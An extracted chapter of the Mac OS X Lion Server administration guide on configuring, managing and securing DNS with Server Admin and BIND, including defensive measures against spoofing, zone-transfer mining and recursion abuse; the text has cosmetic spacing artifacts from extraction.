After a name s erver is provided with the name/address pair of a host in another domain (outside the domain it s erves ), the information is cached, ensuring that IP addresses for recently resolved names are stored for later use. DNS information is usually cached on your name server for a set time, referred to as a time-to-live (TTL) value. When the TTL value for a domain name/IP address pair has expired, the entry is deleted from the name servers cache and your server requests the information as needed.
DNS
Overview of DNS setup

If youre us ing an external DNS name server and you entered its IP addres s in the Gateway Setup Assistant, you dont need to do anything else. If youre setting up your own DNS server, you must do the following. Register your domain name Domain name regis tration is managed by IANA. IANA registration makes sure that domain names are unique acros s the Internet. (For more information, see http://www.iana.org.) If you dont regis ter your domain name, your network cant communicate over the Internet. After you register a domain name, you can create s ubdomains as long as you s et up a DNS server on your network to track the subdomain names and IP addresses . For example, if you register the domain name example.com, you could create subdomains s uch as host1.example.com, mail.example.com, or www.example.com. A server in a subdomain could be named primary.www.example.com or backup.www.example.com. The DNS s erver for example.com tracks information for its s ubdomains, such as hos t (computer) names , static IP addresses, aliases , and mail exchangers. If your ISP handles your DNS s ervice, you must inform them of changes you make to your domain name, including added subdomains . The range of IP addresses used with a domain mus t be clearly defined before setup. These address es are used exclusively for one s pecific domain, never by another domain or s ubdomain. Coordinate the range of addresses with your network administrator or ISP. Learn and plan If youre new to DNS, learn and understand DNS concepts , tools, and features of Lion Server and BIND. See Find more DNS information. When youre ready, plan your DNS s ervice. Consider the following questions: Do you need a local DNS s erver? Does your ISP provide DNS s ervice? Can you use multicast DNS names ins tead? How many s ervers do you need? How many additional servers do you need for backup DNS purposes? For example, should you designate a second or third computer for DNS service backup? What is your security strategy to deal with unauthorized us e? How often should you s chedule periodic inspections or tests of DNS records to verify data integrity? How many s ervices or devices (such as intranet webs ites or network printers) need a name? There are two ways to configure DNS service on a Mac s erver: Use Server Admin. This is the recommended method. Edit the BIND configuration file. BIND is the set of programs used by Lion Server that implements DNS. One of those programs is the name daemon, or named. To set up and configure BIND, you mus t change the configuration file and the zone file. The configuration file is /etc/named.conf. The zone file name is based on the name of the zone. For example, the zone file example.com is /var/named/example.com.zone. If you edit named.conf to configure BIND, dont change the inet settings of the controls statement. Otherwise, Server Admin cant retrieve s tatus information for DNS. The inet settings should look like this:
controls { inet 127.0.0.1 port 54 allow {any;} keys { "rndc-key"; }; }; Important: In Mac OS X Server v10.6 or later, the configuration and zone files used by Server Admin have changed. If you edit named.conf and zone files manually from Terminal, the information is used by DNS. However, the information does not appear in the DNS zones pane of Server Admin. Also, changes made in Server Admin are not made to named.conf. Turn DNS service on Before configuring DNS s ervice, turn on DNS. See Turn on DNS service. Create a DNS zone and add machine records Use Server Admin to set up DNS zones. See Configure DNS service primary zone s ettings . After adding a primary zone, Server Admin creates a name server record with the same name as the Source of Authority (SOA). For each zone you create, Mac OS X Server creates a reverse lookup zone. Reverse lookup zones trans late IP addresses to domain names. (Compare with normal lookups, which translate domain names to IP addresses.) Use Server Admin to add records to your zone. Create an Address record for every computer or device (such as a printer or file server) that has a static IP address and needs a name. Various DNS zone records are created from DNS machine entries. Configure secondary zones If necess ary, use Server Admin to configure s econdary zones. See Configure DNS service secondary zone settings. Configure Bonjour Use Server Admin to configure Bonjour settings. See Configure DNS s ervice Bonjour s ettings. Configure logging Use Server Admin to specify the information that gets logged by DNS s ervice and to s pecify the location of the log file. See Change DNS log detail levels. (Optional) Set up a mail exchange (MX) record If you provide mail s ervice over the Internet, set up an MX record for your server. See Configure DNS for Mail s ervice. Configure your firewall Configure your firewall to make sure DNS s ervice is protected from attack and accessible to your clients. See Defend against server mining. Start DNS service Lion Server includes a simple interface for starting and stopping DNS service. See Start DNS service.
DNS
Upgrade your DNS configuration

Lion Server manages DNS entries more efficiently than Mac OS X Server v10.5. To take advantage of this, DNS records created on Mac OS X Server v10.5 must be upgraded. After you upgrade to Lion Server and enable on DNS in Server Admin, the upgrade pane appears the first time you click DNS. (The upgrade pane appears only if you upgraded to Lion Server from a version prior to Mac OS X Server v10.5. It does not appear if Lion Server was newly installed.) The upgrade pane has two options: Dont Upgrade: If you choose to not upgrade your configuration, you cannot us e Server Admin to automatically configure DNS. You can manually configure files using the /etc/named.conf file for DNS configuration and the /var/named file for Zone configuration. Upgrade: The Upgrade option converts DNS file records and then allows acces s to the DNS panes of Server Admin. When upgrading, backup files are created. If the files mus t be restored, they can be res tored manually. Backup files are saved in the s ame folders where the original files are located.
DNS
Set up DNS
Turn on DNS service

Before you can configure DNS settings, turn on DNS s ervice in Server Admin.
1. Open Server Admin and connect to the s erver. 2. Click Settings. 3. Click Services. 4. Select the DNS checkbox. 5. Click Save.
DNS
Set up DNS
Configure DNS service primary zone settings

Use Server Admin to create a local DNS zone file and add records to it. Important: In Mac OS X Server v10.6 and Mac OS X Lion Server, the configuration and zone files used by Server Admin have changed. If you edit the named.conf and zone files manually from Terminal, the information is used by DNS. However, the information does not appear in the DNS zones pane of Server Admin. Also, changes made in Server Admin are not made to the named.conf file. It is recommended that you us e Server Admin.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select DNS. 4. Click Zones. 5. Click Add Zone, then choose Add Primary Zone (Master). 6. Select a new zone. 7. In the Primary Zone Name field, enter the zone name. This is the domain name of the primary server. 8. Enter the mail address of the zones administrator. 9. Select Allows zone transfer to permit secondary zones to get copies of the primary zone data. 10. Add name servers for this zone by clicking the Add button (+) and entering the name in the Name Servers field. 11. Add mail exchangers for this zone by clicking the Add button (+) and entering the name in the Mail Exchangers field. This field is the basis for the computers MX record. 12. In the Priority field, specify a mail server precedence number . Delivering mail s ervers try to deliver mail at lower numbered mail servers first. 13. Click Expiration and enter the number of hours for each setting Enter the amount of time the zone is valid. This is the zones time to live (TTL) value. It determines how long query response information can remain cached in remote DNS systems before requerying the authoritative server. Enter the interval of time that the secondary zones should refres h from the primary zone. Enter the interval of time between each retry if the refresh of the secondary zone fails. Enter the amount of time after refreshing before the zone data expires. 14. Click Add Record, then choos e Add Alias (CNAME).
To s ee a list of records for a zone, click the triangle at the left of the zone. 15. Select newAlias lis ted under the primary zone. You can add as many aliases as you want. 16. In the Alias Name field, enter the alternate name for your computer. To use the fully qualified name for the Alias, select the Fully Qualified checkbox and enter the fully qualified domain name. This field is the basis for CNAME records of the computer. Revers e lookup Pointer records are created for the computer. 17. In the Destination field, enter the computer name you are creating the alias for. To use the fully qualified name for the Des tination, select the Fully Qualified checkbox and enter the fully qualified domain name. 18. Click Add Record, then choos e Add Machines (A). 19. Under the primary zone, s elect newMachine, then enter the following machine information. In the Machine Name field, enter the hostname of the computer. This field is the basis for the A record of the computer. Revers e lookup Pointer records are created for the computer. Click the Add button (+), then enter the IP address of the computer. Enter information about the hardware and s oftware of the computer in the relevant text boxes. These are the bas is for the HINFO record of the computer. Enter comments about the computer in the Comments text box. This field is the basis for the TXT record of the computer. You can store almos t any text string in the comments text box up to 255 ASCII characters. For example, you can include the phys ical location of the computer (Upstairs s erver closet B) or the computers owner (Johns Computer) or any other information about the computer. 20. Click Add Record, then choos e Add Service (SRV). The DNS SRV record is an entry that informs client computers that a service is on a domain. These records help computers with the location of a s ervice on a domain. For more information, see Add a service record to a DNS zone. 21. Under the primary zone, s elect a service type and enter the s ervice information. 22. Click Save.
DNS
Set up DNS
Configure DNS service secondary zone settings

A secondary zone is a copy of a primary zone stored on a secondary name s erver. Each secondary zone keeps a list of primary servers it contacts for updates to records in the primary zone. Secondary zones must be configured to request the copy of primary zone data. Secondary zones us e zone transfers to get copies of primary zone data. Secondary name servers can take lookup requests like primary s ervers.
1. Make sure the primary s erver is correctly configured and that zone transfers are enabled on the primary server; then open Server Admin and connect to the server. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select DNS. 4. Click Zones. 5. Click Add Zone, then choose Add Secondary Zone (Slave).
6. Select the new zone. 7. In the Secondary Zone Name field, enter a zone name. The zone name is the same as the primary zone defined on the primary name server. 8. Below the Primary DNS Servers lis t, click the Add button (+). 9. Enter the IP address es for each primary server in this secondary zone. 10. Click Save.
DNS
Set up DNS
Configure DNS service Bonjour settings

With Bonjour, you can easily connect a computer or other device to an exis ting wired or wireless Ethernet network, or you can create instant networks of multiple devices without additional network configuration. If your computers or devices support Bonjour, it broadcasts and discovers services from other computers or devices us ing Bonjour. You can quickly and easily network computers and devices that s upport Bonjour. Bonjour requires no configuration for computers or devices on your local s ubnet. Devices on the s ame subnet that support Bonjour and have it turned on find each other. However, to provide Bonjour-browsing across subnets or on the Internet, you must set up a dedicated Bonjour browse domain that allows Bonjour-supported devices to locate s ervices from anywhere on the Internet. Using Server Admin you can des ignate any domain you set up in DNS as the domain for Bonjour browsing. You can then add SRV records to the Bonjour brows ing domain for each service type. These services appear on computers that have the Bonjour browsing domain entered as a search domain in Network Preferences. You can add the Bonjour browsing domain to the search domain of each computer manually or through DHCP. For mobile clients , enter the search domain manually so they have Bonjour browsing access from anywhere. For more information about adding SRV records, s ee Add a service record to a DNS zone.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select DNS. 4. Click Bonjour. 5. Select the Enable automatic client Bonjour browsing for domain checkbox and enter the Fully Qualified Domain Name (FQDN) of the domain used for Bonjour browsing (for example, b onjour.company.com ). This s ets a default Bonjour browsing domain for primary zones. 6. Click Save.
DNS
Set up DNS
Configure DNS service settings

You use the Settings pane in DNS to set the detail level of the DNS s ervice log. You might want a highly detailed log for debugging or a les s detailed log that only shows critical warnings . You s et recurs ive queries , which the DNS s erver fully answers (or gives an error). If the query is unanswered, it is forwarded to the IP address es you add in the Forwarder IP Address es lis t.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select DNS.
4. Click Settings. 5. From the Log Level pop-up menu, choose the detail level as follows: Choose Critical to record only critical errors, such as hardware errors . Choose Error to record errors not including warning mess ages. Choose Warning to record warnings and errors . Choose Notice to record only important messages , warnings, and errors . Choose Information to record mos t mes sages. Choose Debug to record all mes sages. The log location is /Library/Logs/named.log. 6. Below the Accept recursive queries from the following networks list, click the Add button (+) to add networks that recursive queries are accepted from, then enter the network address in the list. 7. Below the Forwarder IP Address es list, click the Add button (+) to add networks that unauthorized queries get forwarded to, then enter the network address in the lis t. 8. Click Save.
DNS
Set up DNS
Use serveradmin to view DNS service settings

You can us e serveradmin to view DNS s ervice settings .
To view a setting: $ sudo serveradmin settings dns:setting To view a group of settings: $ sudo serveradmin settings dns:zone:_array_id:localhost:* Enter as much of the name as you want, s topping at a colon (:), and then entering an asterisk (*) as a wildcard for the remaining parts of the name. To view all service configuration settings : $ sudo serveradmin settings dns To modify your servers DNS configuration, us e serveradmin. However, it is more straightforward to work with DNS and BIND us ing the standard tools and techniques described in the many books on the subject. (For an example, see DNS and BIND by Paul Albitz and Cricket Liu.)
DNS
Set up DNS
Start DNS service

Use Server Admin to start DNS s ervice. Remember to restart DNS service when you make changes to DNS service in Server Admin.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select DNS. 4. Click Start DNS (below the Servers list).
The service can take a few seconds to s tart.
DNS
Set up DNS
Use serveradmin to start DNS service

You can start DNS s ervice us ing serveradmin
To start the service: $ sudo serveradmin start dns For information about serveradmin, see its man page.
DNS
Manage DNS
Check DNS service status

You can us e Server Admin to check the status of DNS service.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select DNS 4. Click Overview to s ee whether the service is running, when it was started, and the number of zones allocated. 5. Click Log to review the s ervice log. Use the Filter field above the log to search for specific entries.
DNS
Manage DNS
Use serveradmin to check DNS status

You can us e serveradmin to view DNS s ervice status.
To s ee summary s tatus of the service: $ sudo serveradmin status dns To s ee detailed status of the service: $ sudo serveradmin fullstatus dns
DNS
Manage DNS
View DNS service logs

DNS service creates entries in the s ys tem log for error and alert mes sages. The log file is named.log. You can filter the log to narrow the number of viewable log entries and make it easier to find those you want to see.
1. Open Server Admin and connect to the s erver 2. Click the triangle at the left of the server.
The list of s ervices appears . 3. From the expanded Servers list, select DNS. 4. Click Log and us e the Filter field above the log to search for specific entries.
DNS
Manage DNS
Use serveradmin to view DNS logs

To view the lates t entries in a log: $ tail log-file To dis play the log path: $ sudo serveradmin command dns:command = getLogPaths The default log path is /Library/Logs/named.log.
DNS
Manage DNS
Change DNS log detail levels

You can change the detail level of the DNS service log. You might want a highly detailed log for debugging or a les s detailed log that only shows critical warnings .
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select DNS. 4. Click Settings. 5. Choose the detail level from the Log Level pop-up menu as follows : Choose Critical to record only critical errors, such as hardware errors . Choose Error to record errors not including warning mess ages. Choose Warning to record warnings and errors . Choose Notice to record only important messages , warnings, and errors . Choose Information to record mos t mes sages. Choose Debug to record all mes sages. 6. Click Save.
DNS
Manage DNS
View DNS service statistics

To view a s ummary of the DNS s ervice workload, use the serveradmin getStatistics command.
Enter the following from the command line in Terminal: $ sudo serveradmin command dns:command = getStatistics The computer responds with output similar to the following:
dns:queriesArray:_array_index:0:name = "NS_QUERIES" dns:queriesArray:_array_index:0:value = -1 dns:queriesArray:_array_index:1:name = "A_QUERIES" dns:queriesArray:_array_index:1:value = -1 dns:queriesArray:_array_index:2:name = "CNAME_QUERIES" dns:queriesArray:_array_index:2:value = -1 dns:queriesArray:_array_index:3:name = "PTR_QUERIES" dns:queriesArray:_array_index:3:value = -1 dns:queriesArray:_array_index:4:name = "MX_QUERIES" dns:queriesArray:_array_index:4:value = -1 dns:queriesArray:_array_index:5:name = "SOA_QUERIES" dns:queriesArray:_array_index:5:value = -1 dns:queriesArray:_array_index:6:name = "TXT_QUERIES" dns:queriesArray:_array_index:6:value = -1 dns:nxdomain = 0 dns:nxrrset = 0 dns:reloadedTime = "" dns:success = 0 dns:failure = 0 dns:recursion = 0 dns:startedTime = "2003-09-10 11:24:03 -0700" dns:referral = 0 For information about serveradmin, see its man page.
DNS
Manage DNS
Stop DNS service

Use Server Admin to stop DNS s ervice.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select DNS. 4. Click Stop DNS (below the Servers list). 5. Click Stop Now.
DNS
Manage DNS
Use serveradmin to stop DNS serivce

You can us e serveradmin to stop DNS s ervice.
To stop the service: $ sudo serveradmin stop dns For information about serveradmin, see its man page.
DNS
Manage DNS
Enable or disable DNS zone transfers

In DNS, zone data is replicated among authoritative DNS servers by means of zone trans fers. Secondary DNS servers (secondaries) use zone transfers to acquire their data from primary DNS s ervers (primaries). You must enable zone transfers to use s econdaries.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select DNS. 4. Click Zones. 5. Select the primary zone to change. 6. Click General. 7. Select or des elect Allows zone transfer to permit secondary zones to get copies of the primary zone data. 8. Click Save.
DNS
Manage DNS
Enable DNS recursion

Recurs ion fully resolves domain names into IP address es. Applications depend on the DNS server to perform this function. Other DNS servers that query your DNS servers dont need to perform the recurs ion. To prevent malicious users from changing the primary zones records (referred to as cache poisoning) and to prevent unauthorized use of the server for DNS s ervice, you can restrict recurs ion. However, if you res trict your private network from recurs ion, users cant use your DNS service to look up names outside of your zones . Disable recurs ion only if: No clients are using this DNS server for name resolution. No servers are us ing it for forwarding.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select DNS. 4. Click Settings. 5. Below the Accept recursive queries from the following networks list, click the Add button (+). 6. Enter the IP address es for the servers that DNS will accept recurs ive queries from. You can also enter IP address ranges. 7. Click Save. If you enable recursion, cons ider dis abling it for external IP addresses but enabling it for LAN IP addres ses by editing the BIND named.conf file. However, edits you make to named.conf do not s how up in the DNS section of Server Admin. To completely disable recurs ion, remove all entries from the network list. For more information about BIND, see www.is c.org/s w/bind.
DNS
Manage DNS zones
Add a primary zone

Use Server Admin to add a primary zone to your DNS server.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select DNS. 4. Click Zones. 5. Click Add Zone, then choose Add Primary Zone (Master). 6. Select the new zone. 7. In the Primary Zone Name field, enter the zone name. This is the fully qualified domain name of the primary s erver. 8. Enter the mail address of the zones administrator. 9. Select Allows zone transfer to permit secondary zones to get copies of the primary zone data. 10. Add names ervers for this zone by clicking the Add button (+) and entering the name in the Nameservers field. 11. Add mail exchangers for this zone by clicking the Add button (+) and entering the name in the Mail Exchangers field. This field is the basis for the computers MX record. 12. In the Priority field, specify a mail server precedence number. Delivering mail s ervers try to deliver mail at lower numbered mail servers first. 13. Click Expiration and enter the number of hours for each setting: Enter the amount of time the zone is valid. This is the zones time to live (TTL) setting. It determines how long query response information can remain cached in remote DNS systems before requerying the authoritative server. Enter the interval of time that the secondary zones should refres h from the primary zone. Enter the interval of time between each retry if the refresh of the secondary zone fails. Enter the amount of time after refreshing before the zone data expires. 14. Click Save.
DNS
Manage DNS zones
Add a secondary zone

Use Server Admin to add a secondary zone to your DNS server. Perform the following steps on the s econdary s erver.
1. Make sure the primary s erver is correctly configured and that zone transfers are enabled on the primary server. 2. On the secondary server, open Server Admin and connect to the s econdary s erver. 3. Click the triangle at the left of the server. The list of s ervices appears . 4. From the expanded Servers list, select DNS. 5. Click Zones. 6. Click Add Zone, then click Add Secondary Zone (Slave). 7. Select a new zone.
8. In the Secondary Zone Name field, enter a zone name. The zone name is the same as the primary zone defined on the primary name server. 9. Below the Primary Zone address es lis t, click the Add button (+). 10. Enter the IP address es for each primary server in the s econdary zone. 11. Click Save.
DNS
Manage DNS zones
Set forwarder IP addresses

If a DNS server cannot resolve a DNS query locally, it can use a forwarder to handle the query. The DNS server forwards the request to another DNS s erver that can respond to the DNS query. This can be us ed acros s separate s ubnets and networks. Use Server Admin to add forwarder IP addres ses.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select DNS. 4. Click Settings. 5. Below the Forwarder IP Addres ses list, click the Add button (+). 6. Enter the IP address es for the DNS server that will receive forwarded unresolved DNS queries. 7. Click Save.
DNS
Manage DNS zones
Change a zone
Use Server Admin to change zone settings. You might need to change the administrator mail address or domain name of a zone.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select DNS. 4. Click Zones. 5. Select the zone to change. 6. Change the zone information as needed. 7. Click Save.
DNS
Manage DNS zones
Delete a zone
When you delete a zone, all records ass ociated with it are deleted.
The list of s ervices appears . 3. From the expanded Servers list, select DNS. 4. Click Zones. 5. Select the zone to delete. 6. Below the Zones list, click Remove. 7. Click Save.
DNS
Manage DNS zones
Import a BIND zone file

You might already have a BIND zone file from a DNS s erver of another platform. If so, instead of entering the information in Server Admin manually, you can use the BIND zone file with your Mac server. Using an existing zone file requires: Root access permiss ions to the BIND configuration file (/etc/named.conf) The working zone directory (/var/named/) A bas ic knowledge of BIND and the Terminal application Otherwis e, use the Server Admin DNS tools. Important: In Lion Server, if you edit named.conf and zone files manually from Terminal, the information is used by DNS. However, the information does not appear in the DNS zones pane of Server Admin. Also, changes made in Server Admin are not made to named.conf. It is recommended that you us e Server Admin.
1. Verify that you have root privileges. 2. Add the zone directive to the BIND configuration file, /etc/named.conf. For example, for zone xyz.com described in zone file db.xyz.com in the working zone folder/var/named/, the zone directive might look like this: zone "xyz.com" IN { // Forward lookup zone for xyz.com type master; // It's a primary zone file "db.xyz.com"; // Zone info stored in /var/named/db.xyz.com allow-update { none; }; }; 3. Confirm that the zone file is added to the /var/named/ working zone folder. 4. Res tart DNS service using Server Admin.
DNS
Manage DNS records
Add an alias record to a DNS zone

You mus t add records for each computer the DNS primary zone has responsibility for. Do not add records for computers the zone doesnt control. An alias record or canonical name (CNAME) record is used to create alias es that point to other names. If you want this computer to have more than one name, add alias records to the zone.
2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select DNS. 4. Click Zones. 5. Select the zone this record is to be added to. 6. Click Add Record, then choos e Add Alias (CNAME). This adds the alias record to the zone. 7. Select newAlias lis ted under the primary zone, then enter the alias information. In the Alias Name field, enter the alternate name for your computer. To use the fully qualified name for the Alias, select the Fully Qualified checkbox and enter the fully qualified domain name. This field is the basis for CNAME records of the computer. Revers e lookup Pointer records are created for the computer. Add as many alias es as you want. 8. In the Destination field, enter the computer name you are creating the alias for. To use the fully qualified name for the Des tination, select the Fully Qualified checkbox and enter the fully qualified domain name. 9. Click Save. Add as many alias es as you want by adding additional alias records.
DNS
Manage DNS records
Add a machine record to a DNS zone

You mus t add records for each computer the DNS primary zone has responsibility for. Do not add records for computers the zone doesnt control. A machine record or address (A) record is us ed to ass ociate a domain name with an IP address. Therefore, there can be only one machine for each IP address because there cant be duplicate IP address es in a zone.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select DNS. 4. Click Zones. 5. Select the zone this record is to be added to. 6. Click Add Record, then choos e Add Machine (A). This adds the machine record to the zone. 7. Select newMachine lis ted under the zone, then enter the following machine information. In the Machine Name field, enter the hostname of the computer. This field is the basis for the A record of the computer. Revers e lookup Pointer records are created for the computer. Click the Add button (+), then enter the IP address of the computer. Enter information about the hardware and s oftware of the computer in the relevant text boxes. These are the basis for the HINFO record of the computer. Enter comments about the computer in the Comment text box. This field is the basis for the TXT record of the computer. You can store up to 255 ASCII characters in the comments text box. You can include the phys ical location of the computer (for example, Upstairs s erver closet B), the computers owner (for example, Johns Computer), or other information about
the computer. 8. Click Save.
DNS
Manage DNS records
Add a service record to a DNS zone

Service (SRV) records are us ed to define services available on a domain. These records help computers with the location of a service on a domain.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select DNS. 4. Click Zones. 5. Select the zone this record is to be added to. 6. Click Add Record, then choos e Add Service (SRV). This adds the service record to the zone. 7. In the Service Name field, enter the well-known name of the service. 8. From the Service Type pop-up menu, select a s ervice type. If the service type for the s ervice you are providing is not lis ted, enter the name in the Service Type field. The s ervice you are providing should use a syntax similar to _application protocol name._tcp | _udp. 9. In the Host field, enter the DNS name of the server that is providing the service. 10. To use the fully qualified domain name of the domain server, select the Fully Qualified checkbox. 11. In the Port field, enter the port number for the service you are providing. For example, if you are providing http s ervice, use port 80. 12. In the Priority field, enter priority number. The priority number is used when multiple hosts are configured for the same service. The priority determines which host is tried firs t. 13. In the Weight field, enter a weight number. The weight number is used as a relative weight for records with the s ame priority. 14. In the TXT field, enter additional information about the service. This creates a TXT record for the service. 15. Click Save.
DNS
Manage DNS records
Change a record in a DNS zone

If you change the namespace for the domain, you mus t update DNS records as often as that namespace changes. Upgrading hardware or adding to a domain name might also require updating DNS records. You can duplicate a record and then edit it, saving configuration time.
3. From the expanded Servers list, select DNS. 4. Click Zones. 5. Click the triangle at the left of the zone that has the computer record to be edited. The list of records appears. 6. Select the record to be edited and make changes in the fields below the lis t. 7. Click Save.
DNS
Manage DNS records
Delete a record from a DNS zone

When a computer is no longer associated with a domain name or usable addres s, delete the associated records .
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select DNS. 4. Click Zones. 5. Click the triangle at the left of the zone that has the computer record to be deleted. The list of records appears. 6. Select the record to be deleted and click Remove below the lis t. 7. Click Save.
DNS
Secure DNS
DNS spoofing
DNS spoofing is adding false data to the DNS servers cache. This enables hackers to: Redirect real domain name queries to alternative IP addres ses . For example, a falsified A record for a bank could point a computer users browser to a different IP address that is controlled by the hacker. A duplicate webs ite could fool users into giving their bank account numbers and pass words to the hacker. Also, a fals ified mail record could enable a hacker to intercept mail s ent to or from a domain. If the hacker then forwards that mail to the correct mail server after copying the mail, this can go undetected. Prevent proper domain name resolution and access to the Internet. This is the most benign of DNS spoof attacks. It merely makes a DNS server appear to be malfunctioning. The mos t effective method to guard against these attacks is vigilance. This includes maintaining up-to-date software and auditing DNS records regularly. If exploits are found in the current vers ion of BIND, the exploits are patched and a security update is made available for Lion Server. Apply all such security patches . Regular audits of your DNS records can help prevent these attacks.
DNS
Secure DNS
Defend against server mining

Server mining is the practice of getting a copy of a complete primary zone by reques ting a zone transfer. In this cas e, a hacker pretends to be a s econdary zone to another primary zone and requests a copy of the primary zones records. With a copy of your primary zone, the hacker can see what kinds of services a domain offers and the IP addresses of the servers that offer them. He or she can then try specific attacks bas ed on thos e services. This is reconnais sance before another attack.
To defend against this attack, specify which IP addresses have permis sion to request zone transfers (your secondary zone servers ) and deny all others. Zone trans fers are accomplished over TCP on port 53. To limit zone transfers, block zone transfer requests from anyone but your secondary DNS servers . To specify zone transfer IP addresses:
1. Create a firewall filter that permits only IP addresses that are inside your firewall to acces s TCP port 53. 2. Follow the instructions for configuring firewall rules , us ing the following s ettings: Packet: Allow Port: 53 Protocol: TCP Source IP: the IP address of your s econdary DNS s erver Des tination IP: the IP address of your primary DNS server
DNS
Secure DNS
Defend against DNS service profiling

Another common reconnaiss ance technique used by malicious us ers is to profile your DNS service. Firs t a hacker makes a BIND version request. The server reports the vers ion of BIND that is running. Then the hacker compares the response to known exploits and vulnerabilities for that version of BIND. To defend against this attack, configure BIND to respond with s omething other than what it is. To alter BIND's vers ion res ponse:
1. Open a command-line text editor (for example vi, emacs, or pico). 2. Open named.conf for editing. 3. To the options brackets of the configuration file, add the following: version "[your text, maybe 'we're not telling!']"; 4. Save named.conf.
DNS
Secure DNS
Denial of service (DoS) and service piggybacking attacks

This kind of attack is common and easy. A hacker sends so many service reques ts and queries that a server us es all its processing power and network bandwidth trying to respond. The hacker prevents legitimate use of the service by overloading it. It is difficult to prevent this type of attack before it begins. Constant monitoring of the DNS s ervice and server load enables an administrator to catch the attack early and mitigate its damaging effect. The easiest way to guard agains t this attack is to block the offending IP address with your firewall. Unfortunately, this means the attack is already underway and the hackers queries are being answered and the activity logged. Service piggybacking This attack is done not so much by malicious intruders but by common Internet users who learn the trick from other users. They might feel that the DNS res ponse time with their own ISP is too slow, s o they configure their computer to query another DNS server instead of their own ISPs DNS s ervers. Effectively, there are more users accessing the DNS server than were planned for. You can guard agains t this type of attack by limiting or disabling DNS recurs ion. If you plan to offer DNS s ervice to your LAN users, they need recursion to resolve domain names, but dont provide this service to Internet users. To prevent recursion entirely, s ee Enable DNS recursion. The mos t common balance is permitting recursion for requests coming from IP address es in your own range but denying recursion to external addresses. BIND enables you to specify this in its configuration file, named.conf. Edit named.conf to include the following:
options { ... allow-recursion{ 127.0.0.0/8; [your internal IP range of addresses, like 192.168.1.0/27]; }; }; For more information, s ee the BIND documentation.
DNS
Common DNS administration tasks
Configure DNS for Mail service

Configuring DNS for mail s ervice involves creating MX records in DNS for your mail servers. If your ISP provides DNS service, contact the ISP so they can enable your MX records. Follow these s teps only if you provide your own DNS service. You might want to set up multiple servers for redundancy. If so, create an MX record for each auxiliary server.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select DNS. 4. Click Zones. 5. Select the zone this record is to be added to. 6. Click the triangle at the left of the zone. The list of records appear. 7. Click Add Record, then choos e Add Machine (A). This adds a machine record to the zone. 8. In the Machine Name field, enter the hos tname of the computer. To use the fully qualified name of the computer, select the Fully Qualified checkbox and enter the fully qualified domain name of the computer. This field is the basis for the A record of the computer. Reverse lookup pointer records are created for the computer. 9. Click the Add button (+) and enter the IP addres ses for the computer. 10. In the relevant text boxes, enter information about the hardware and s oftware of the computer. 11. In the Comment text box, enter comments about the computer. This field is the basis for the TXT record of the computer. You can s tore up to 255 ASCII characters in the comments text box. You can include the phys ical location of the computer (for example, Upstairs server closet B), the computers owner (for example, Johns Computer), or any other information about the computer. 12. Click Save. 13. To add other names that you want this computer to have, click Add Record and choos e Add Alias (CNAME). Add as many alias es as you want for your server. 14. In the Alias Name field, enter the alternate name for your computer. To use the fully qualified name for the Alias, select the Fully Qualified checkbox and enter the fully qualified domain name. This field is the basis for the CNAME records of the computer. Revers e lookup pointer records are created for the computer
15. In the Destination field, enter the computer name you are creating the alias for. To use the fully qualified name for the Des tination, select the Fully Qualified checkbox and enter the fully qualified domain name. 16. Click Save 17. From the expanded Servers list, select Mail. 18. Click Settings, then click Advanced. 19. Click Hos ting. 20. Next to the Local Host Aliases Field, click the Add button (+). 21. In the Local Host Alias field, enter the alias name you created earlier. 22. Click OK, then click Save. 23. Repeat Steps 7 through 22 for each mail server.
DNS
Set up namespace behind a NAT gateway

If youre behind a NAT gateway, you have a set of IP addresses that are us able only in the NAT environment. If you were to assign a domain name to these addresses outside the NAT gateway, none of the domain names would resolve to the correct computer. For more information about NAT, enter NAT in the help s earch field. However, you can run DNS service behind the gateway, ass igning hos t names to NAT IP address es. This way, if youre behind the NAT gateway, you can enter domain names rather than IP addres ses to access s ervers, services, and workstations . Your DNS server should also have a Forwarding zone to s end DNS requests outside of the NAT gateway to permit resolution of names outside the routed area. Your client network settings should specify the DNS server behind the NAT gateway. The proces s of setting up one of these networks is the same as setting up a private network. For more information, s ee Link a LAN to the Internet through one IP address. If you set up namespace behind the NAT gateway, names entered by users outside the gateway wont resolve to address es behind it. Set the DNS records outside the NAT-routed area to point to the NAT gateway and use NAT port forwarding to access computers behind the NAT gateway. For more information, see Configure port forwarding. Lions Multicast DNS feature permits you to use hostnames on your local subnet that end with the .local suffix without enabling DNS. Any s ervice or device that s upports Multicast DNS permits the us e of user-defined namespace on your local subnet without setting up and configuring DNS.
DNS
Network load distribution (round robin)

